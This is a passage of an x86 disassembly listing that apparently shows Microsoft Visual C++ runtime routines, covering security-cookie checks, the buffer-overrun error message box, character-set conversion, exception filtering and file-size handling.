loc_420321: ; CODE XREF: sub_4202EF+2B�j
lea eax, [ebp+var_C]
push eax
call sub_416C7A
pop ecx
loc_42032B: ; CODE XREF: sub_4202EF+30�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41C596
leave
retn
sub_4202EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420338 proc near ; CODE XREF: sub_41C1A9+2A8�p
; sub_41C1A9+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_42CB78
call __SEH_prolog
mov eax, dword_432A68
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_4204E1
lea ecx, [ebp+var_40]
push ecx
push eax
mov esi, dword_4221B4
call esi ; GetCPInfo
test eax, eax
jz short loc_42039F
cmp [ebp+var_40], 1
jnz short loc_42039F
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_42039F
cmp [ebp+var_40], 1
jnz short loc_42039F
mov [ebp+var_2C], 1
loc_42039F: ; CODE XREF: sub_420338+45�j
; sub_420338+4B�j ...
cmp [ebp+var_2C], edi
jz short loc_4203BE
cmp ebx, 0FFFFFFFFh
jz short loc_4203AD
mov esi, ebx
jmp short loc_4203B9
; ---------------------------------------------------------------------------
loc_4203AD: ; CODE XREF: sub_420338+6F�j
push [ebp+arg_8]
call sub_419D70
pop ecx
mov esi, eax
inc esi
loc_4203B9: ; CODE XREF: sub_420338+73�j
mov [ebp+var_44], esi
jmp short loc_4203C1
; ---------------------------------------------------------------------------
loc_4203BE: ; CODE XREF: sub_420338+6A�j
mov esi, [ebp+var_44]
loc_4203C1: ; CODE XREF: sub_420338+84�j
cmp [ebp+var_2C], edi
jnz short loc_4203E0
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_4220D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_44], esi
cmp esi, edi
jz short loc_420438
loc_4203E0: ; CODE XREF: sub_420338+8C�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_41E8F0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_420424
; ---------------------------------------------------------------------------
loc_42040D: ; DATA XREF: .text:stru_42CB78�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_420411: ; DATA XREF: .text:stru_42CB78�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_44]
loc_420424: ; CODE XREF: sub_420338+D3�j
cmp ebx, edi
jnz short loc_420446
push esi
push 2
call sub_41E61E
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_42043F
loc_420438: ; CODE XREF: sub_420338+A6�j
xor eax, eax
jmp loc_4204F3
; ---------------------------------------------------------------------------
loc_42043F: ; CODE XREF: sub_420338+FE�j
mov [ebp+var_24], 1
loc_420446: ; CODE XREF: sub_420338+EE�j
push esi
push ebx
push [ebp+var_28]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jz loc_4204E4
cmp [ebp+arg_10], edi
jz short loc_420486
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_4220D8 ; WideCharToMultiByte
test eax, eax
jz short loc_4204E4
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
jmp short loc_4204E4
; ---------------------------------------------------------------------------
loc_420486: ; CODE XREF: sub_420338+12C�j
cmp [ebp+var_2C], edi
jnz short loc_4204A1
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_4220D8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_4204E4
loc_4204A1: ; CODE XREF: sub_420338+151�j
push esi
push 1
call sub_41E61E
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_4204E4
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_4220D8 ; WideCharToMultiByte
cmp eax, edi
jnz short loc_4204D4
push [ebp+var_20]
call sub_416D07
pop ecx
mov [ebp+var_20], edi
jmp short loc_4204E4
; ---------------------------------------------------------------------------
loc_4204D4: ; CODE XREF: sub_420338+18C�j
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_4204E4
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_4204E4
; ---------------------------------------------------------------------------
loc_4204E1: ; CODE XREF: sub_420338+30�j
mov ebx, [ebp+var_48]
loc_4204E4: ; CODE XREF: sub_420338+123�j
; sub_420338+144�j ...
cmp [ebp+var_24], edi
jz short loc_4204F0
push ebx
call sub_416D07
pop ecx
loc_4204F0: ; CODE XREF: sub_420338+1AF�j
mov eax, [ebp+var_20]
loc_4204F3: ; CODE XREF: sub_420338+102�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41C596
call __SEH_epilog
retn
sub_420338 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420507 proc near ; DATA XREF: .text:0042E004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+var_8]
push eax
call dword_422160 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call dword_4220F8 ; GetCurrentProcessId
xor esi, eax
call dword_422178 ; GetCurrentThreadId
xor esi, eax
call dword_422004 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call dword_422038 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_432A68, esi
jnz short loc_42055A
mov dword_432A68, 0BB40E64Eh
loc_42055A: ; CODE XREF: sub_420507+47�j
pop esi
leave
retn
sub_420507 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42055D proc near ; CODE XREF: sub_41C596-1D�p
var_140 = dword ptr -140h
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_42CD28
call __SEH_prolog
mov eax, dword_432A68
xor eax, [ebp+4]
mov [ebp+var_1C], eax
mov eax, dword_4814DC
xor ecx, ecx
cmp eax, ecx
jz short loc_4205A1
mov [ebp+ms_exc.disabled], ecx
push [ebp+arg_4]
push [ebp+arg_0]
call eax
pop ecx
pop ecx
loc_42058F: ; CODE XREF: sub_42055D+42�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_42069F
; ---------------------------------------------------------------------------
loc_420598: ; DATA XREF: .text:stru_42CD28�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_42059C: ; DATA XREF: .text:stru_42CD28�o
mov esp, [ebp+ms_exc.old_esp]
jmp short loc_42058F
; ---------------------------------------------------------------------------
loc_4205A1: ; CODE XREF: sub_42055D+23�j
mov eax, [ebp+arg_0]
dec eax
jz short loc_4205BA
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov [ebp+var_20], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_4205CB
; ---------------------------------------------------------------------------
loc_4205BA: ; CODE XREF: sub_42055D+48�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov [ebp+var_20], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_4205CB: ; CODE XREF: sub_42055D+5B�j
mov [ebp+var_24], cl
push 104h
lea eax, [ebp+var_128]
push eax
push ecx
call dword_422010 ; GetModuleFileNameA
test eax, eax
jnz short loc_4205F8
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp+var_128]
push eax
call sub_41BFE0
pop ecx
pop ecx
loc_4205F8: ; CODE XREF: sub_42055D+86�j
lea ebx, [ebp+var_128]
lea eax, [ebp+var_128]
push eax
call sub_419D70
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_42063C
lea eax, [ebp+var_128]
push eax
call sub_419D70
mov ebx, eax
lea eax, [ebp+var_128]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_416A00
add esp, 10h
loc_42063C: ; CODE XREF: sub_42055D+B4�j
push ebx
call sub_419D70
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
push edi
push esi
call sub_41BFE0
mov edi, offset asc_42C988 ; "\n\n"
push edi
push esi
call sub_41BFF0
push offset dword_42CB84
push esi
call sub_41BFF0
push ebx
push esi
call sub_41BFF0
push edi
push esi
call sub_41BFF0
push [ebp+var_20]
push esi
call sub_41BFF0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_4207EB
add esp, 3Ch
loc_42069F: ; CODE XREF: sub_42055D+36�j
push 3
call sub_418434
int 3 ; Trap to Debugger
loc_4206A7: ; DATA XREF: sub_4206ED�o
; .text:00432A6C�o
push esi
mov esi, [esp+148h+var_140]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4206CA
cmp dword ptr [eax+10h], 3
jnz short loc_4206CA
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4206CA
call sub_41CEC1
loc_4206CA: ; CODE XREF: sub_42055D+157�j
; sub_42055D+15D�j ...
mov eax, dword_4814E0
test eax, eax
jz short loc_4206E7
push eax
call sub_420745
test eax, eax
pop ecx
jz short loc_4206E7
push esi
call dword_4814E0
jmp short loc_4206E9
; ---------------------------------------------------------------------------
loc_4206E7: ; CODE XREF: sub_42055D+174�j
; sub_42055D+17F�j
xor eax, eax
loc_4206E9: ; CODE XREF: sub_42055D+188�j
pop esi
retn 4
sub_42055D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4206ED proc near ; DATA XREF: .text:0042E01C�o
push offset loc_4206A7
call dword_422148 ; SetUnhandledExceptionFilter
mov dword_4814E0, eax
xor eax, eax
retn
sub_4206ED endp
; =============== S U B R O U T I N E =======================================
sub_420700 proc near ; DATA XREF: .text:0042E034�o
push dword_4814E0
call dword_422148 ; SetUnhandledExceptionFilter
retn
sub_420700 endp
; =============== S U B R O U T I N E =======================================
sub_42070D proc near ; CODE XREF: sub_41C99A+53�p
; sub_41C99A+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_422144 ; IsBadReadPtr
test eax, eax
jz short loc_420725
xor esi, esi
loc_420725: ; CODE XREF: sub_42070D+14�j
mov eax, esi
pop esi
retn
sub_42070D endp
; =============== S U B R O U T I N E =======================================
sub_420729 proc near ; CODE XREF: sub_41C99A+65�p
; sub_41C99A+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_422198 ; IsBadWritePtr
test eax, eax
jz short loc_420741
xor esi, esi
loc_420741: ; CODE XREF: sub_420729+14�j
mov eax, esi
pop esi
retn
sub_420729 endp
; =============== S U B R O U T I N E =======================================
sub_420745 proc near ; CODE XREF: sub_41C99A+128�p
; sub_42055D+177�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call dword_422140 ; IsBadCodePtr
test eax, eax
jz short loc_420759
xor esi, esi
loc_420759: ; CODE XREF: sub_420745+10�j
mov eax, esi
pop esi
retn
sub_420745 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CEC1
loc_42075D: ; CODE XREF: sub_41CEC1:loc_41CEF1�j
push 0Ah
call sub_41D967
push 16h
call sub_4213F3
pop ecx
pop ecx
push 3
call sub_418434
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41CEC1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420775 proc near ; CODE XREF: sub_41D56C+7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_42CD38
call __SEH_prolog
cmp dword_482984, 3
jnz short loc_4207C4
push 4
call sub_41A1D6
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
push esi
call sub_41A24F
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_4207B2
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_4207B5
; ---------------------------------------------------------------------------
loc_4207B2: ; CODE XREF: sub_420775+30�j
mov esi, [ebp+var_20]
loc_4207B5: ; CODE XREF: sub_420775+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4207E2
cmp [ebp+var_1C], 0
jnz short loc_4207D7
loc_4207C4: ; CODE XREF: sub_420775+13�j
push [ebp+arg_0]
push 0
push dword_482980
call dword_42213C ; RtlSizeHeap
mov esi, eax
loc_4207D7: ; CODE XREF: sub_420775+4D�j
mov eax, esi
call __SEH_epilog
retn
sub_420775 endp
; =============== S U B R O U T I N E =======================================
sub_4207DF proc near ; DATA XREF: .text:stru_42CD38�o
mov esi, [ebp-20h]
sub_4207DF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4207E2 proc near ; CODE XREF: sub_420775+44�p
push 4
call sub_41A142
pop ecx
retn
sub_4207E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4207EB proc near ; CODE XREF: sub_41D967+132�p
; sub_42055D+13A�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_4814E4, ebx
push esi
push edi
jnz short loc_42086B
push offset aUser32_dll ; "user32.dll"
call dword_422088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4208A6
mov esi, dword_422084
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4814E4, eax
jz short loc_4208A6
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4814E8, eax
call esi ; GetProcAddress
cmp dword_481184, 2
mov dword_4814EC, eax
jnz short loc_42086B
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4814F4, eax
jz short loc_42086B
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_4814F0, eax
loc_42086B: ; CODE XREF: sub_4207EB+11�j
; sub_4207EB+60�j ...
mov eax, dword_4814F0
test eax, eax
jz short loc_4208B0
call eax ; GetProcessWindowStation
test eax, eax
jz short loc_420897
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_4814F4 ; GetUserObjectInformationA
test eax, eax
jz short loc_420897
test [ebp+var_8], 1
jnz short loc_4208B0
loc_420897: ; CODE XREF: sub_4207EB+8D�j
; sub_4207EB+A4�j
cmp dword_481190, 4
jb short loc_4208AA
or [ebp+arg_A], 20h
jmp short loc_4208CF
; ---------------------------------------------------------------------------
loc_4208A6: ; CODE XREF: sub_4207EB+22�j
; sub_4207EB+3D�j
xor eax, eax
jmp short loc_4208DF
; ---------------------------------------------------------------------------
loc_4208AA: ; CODE XREF: sub_4207EB+B3�j
or [ebp+arg_A], 4
jmp short loc_4208CF
; ---------------------------------------------------------------------------
loc_4208B0: ; CODE XREF: sub_4207EB+87�j
; sub_4207EB+AA�j
mov eax, dword_4814E8
test eax, eax
jz short loc_4208CF
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_4208CF
mov eax, dword_4814EC
test eax, eax
jz short loc_4208CF
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_4208CF: ; CODE XREF: sub_4207EB+B9�j
; sub_4207EB+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_4814E4 ; MessageBoxA
loc_4208DF: ; CODE XREF: sub_4207EB+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_4207EB endp
; =============== S U B R O U T I N E =======================================
sub_4208E4 proc near ; CODE XREF: sub_420915+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_481721[eax], cl
jnz short loc_420911
cmp [esp+arg_4], 0
jz short loc_42090A
movzx eax, word_42C17A[eax*2]
and eax, [esp+arg_4]
jmp short loc_42090C
; ---------------------------------------------------------------------------
loc_42090A: ; CODE XREF: sub_4208E4+16�j
xor eax, eax
loc_42090C: ; CODE XREF: sub_4208E4+24�j
test eax, eax
jnz short loc_420911
retn
; ---------------------------------------------------------------------------
loc_420911: ; CODE XREF: sub_4208E4+F�j
; sub_4208E4+2A�j
xor eax, eax
inc eax
retn
sub_4208E4 endp
; =============== S U B R O U T I N E =======================================
sub_420915 proc near ; CODE XREF: sub_41DC7B+35�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_4208E4
add esp, 0Ch
retn
sub_420915 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420926 proc near ; CODE XREF: sub_41E2D9+54�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_41F57B
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_420957
call sub_41B9A5
mov dword ptr [eax], 9
jmp short loc_420980
; ---------------------------------------------------------------------------
loc_420957: ; CODE XREF: sub_420926+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call dword_422090 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_420986
call dword_422008 ; RtlGetLastWin32Error
test eax, eax
jz short loc_420986
push eax
call sub_41B9B7
pop ecx
loc_420980: ; CODE XREF: sub_420926+2F�j
mov eax, edi
mov edx, edi
jmp short loc_4209A5
; ---------------------------------------------------------------------------
loc_420986: ; CODE XREF: sub_420926+47�j
; sub_420926+51�j
mov eax, esi
sar eax, 5
mov eax, dword_481600[eax*4]
and esi, 1Fh
lea ecx, [esi+esi*8]
lea eax, [eax+ecx*4+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_4209A5: ; CODE XREF: sub_420926+5E�j
pop edi
pop esi
leave
retn
sub_420926 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
mov al, 0FFh
mov edi, edi
loc_4209C0: ; CODE XREF: .text:004209D0�j
; .text:004209F0�j
or al, al
jz short loc_4209F6
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_4209C0
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_4209C0
sbb al, al
sbb al, 0FFh
loc_4209F6: ; CODE XREF: .text:004209C2�j
movsx eax, al
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4209FE proc near ; CODE XREF: sub_41F8F5+2BD�p
var_100C = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_416B90
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
push esi
push 1
xor esi, esi
push esi
push [ebp+arg_0]
mov [ebp+var_4], eax
call sub_41D6E6
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_420B28
push 2
push esi
push [ebp+arg_0]
call sub_41D6E6
add esp, 0Ch
cmp eax, ebx
jz loc_420B28
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_420ACB
mov ebx, 1000h
push ebx
lea eax, [ebp+var_100C]
push esi
push eax
call sub_41E8F0
push 8000h
push [ebp+arg_0]
call sub_4215D1
add esp, 14h
mov [ebp+var_C], eax
loc_420A7C: ; CODE XREF: sub_4209FE+A2�j
cmp edi, ebx
mov eax, ebx
jge short loc_420A84
mov eax, edi
loc_420A84: ; CODE XREF: sub_4209FE+82�j
push eax
lea eax, [ebp+var_100C]
push eax
push [ebp+arg_0]
call sub_41E2D9
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_420AA4
sub edi, eax
test edi, edi
jg short loc_420A7C
jmp short loc_420ABC
; ---------------------------------------------------------------------------
loc_420AA4: ; CODE XREF: sub_4209FE+9C�j
call sub_41B9AE
cmp dword ptr [eax], 5
jnz short loc_420AB9
call sub_41B9A5
mov dword ptr [eax], 0Dh
loc_420AB9: ; CODE XREF: sub_4209FE+AE�j
or esi, 0FFFFFFFFh
loc_420ABC: ; CODE XREF: sub_4209FE+A4�j
push [ebp+var_C]
push [ebp+arg_0]
call sub_4215D1
pop ecx
pop ecx
jmp short loc_420B13
; ---------------------------------------------------------------------------
loc_420ACB: ; CODE XREF: sub_4209FE+56�j
jge short loc_420B13
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D6E6
push [ebp+arg_0]
call sub_41F57B
add esp, 10h
push eax
call dword_422138 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_420B13
call sub_41B9A5
mov dword ptr [eax], 0Dh
call sub_41B9AE
mov edi, eax
call dword_422008 ; RtlGetLastWin32Error
mov [edi], eax
loc_420B13: ; CODE XREF: sub_4209FE+CB�j
; sub_4209FE:loc_420ACB�j ...
push 0
push [ebp+var_8]
push [ebp+arg_0]
call sub_41D6E6
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_420B2A
; ---------------------------------------------------------------------------
loc_420B28: ; CODE XREF: sub_4209FE+32�j
; sub_4209FE+48�j
mov eax, ebx
loc_420B2A: ; CODE XREF: sub_4209FE+128�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
pop ebx
call sub_41C596
leave
retn
sub_4209FE endp
; =============== S U B R O U T I N E =======================================
sub_420B39 proc near ; CODE XREF: sub_41FC63+23�p
; sub_41FC63+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_420B4F
cmp ecx, esi
jnb short loc_420B52
loc_420B4F: ; CODE XREF: sub_420B39+10�j
xor eax, eax
inc eax
loc_420B52: ; CODE XREF: sub_420B39+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_420B39 endp
; =============== S U B R O U T I N E =======================================
sub_420B5A proc near ; CODE XREF: sub_420C13+4B�p
; sub_420C13+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_420B39
add esp, 0Ch
test eax, eax
jz short loc_420B8C
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_420B39
add esp, 0Ch
test eax, eax
jz short loc_420B8C
inc dword ptr [esi+8]
loc_420B8C: ; CODE XREF: sub_420B5A+19�j
; sub_420B5A+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_420B39
add esp, 0Ch
test eax, eax
jz short loc_420BA4
inc dword ptr [esi+8]
loc_420BA4: ; CODE XREF: sub_420B5A+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_420B39
add esp, 0Ch
pop edi
pop esi
retn
sub_420B5A endp
; =============== S U B R O U T I N E =======================================
sub_420BB8 proc near ; CODE XREF: sub_420C13+3B�p
; sub_420C13+41�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_420BB8 endp
; =============== S U B R O U T I N E =======================================
sub_420BE6 proc near ; CODE XREF: sub_421131+1C1�p
; sub_421633+18A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_420BE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420C13 proc near ; CODE XREF: sub_420CF7+362�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_8], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_420C91
mov [ebp+arg_8], eax
loc_420C45: ; CODE XREF: sub_420C13+7A�j
mov esi, ebx
lea edi, [ebp+var_14]
movsd
movsd
push ebx
movsd
call sub_420BB8
push ebx
call sub_420BB8
lea eax, [ebp+var_14]
push eax
push ebx
call sub_420B5A
push ebx
call sub_420BB8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ebx
call sub_420B5A
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_420C45
xor edx, edx
loc_420C91: ; CODE XREF: sub_420C13+2D�j
cmp [ebx+8], edx
jnz short loc_420CC5
mov edi, [ebx+8]
loc_420C99: ; CODE XREF: sub_420C13+AD�j
mov ecx, [ebx+4]
add [ebp+var_8], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_420C99
mov [ebx+8], edi
loc_420CC5: ; CODE XREF: sub_420C13+81�j
mov esi, 8000h
jmp short loc_420CDA
; ---------------------------------------------------------------------------
loc_420CCC: ; CODE XREF: sub_420C13+CA�j
push ebx
call sub_420BB8
add [ebp+var_8], 0FFFFh
pop ecx
loc_420CDA: ; CODE XREF: sub_420C13+B7�j
test [ebx+8], esi
jz short loc_420CCC
mov ecx, [ebp+var_4]
mov ax, word ptr [ebp+var_8]
xor ecx, [ebp+4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_41C596
leave
retn
sub_420C13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420CF7 proc near ; CODE XREF: sub_41FF55+22�p
; sub_41FF98+22�p
var_58 = byte ptr -58h
var_41 = byte ptr -41h
var_3C = dword ptr -3Ch
var_36 = dword ptr -36h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
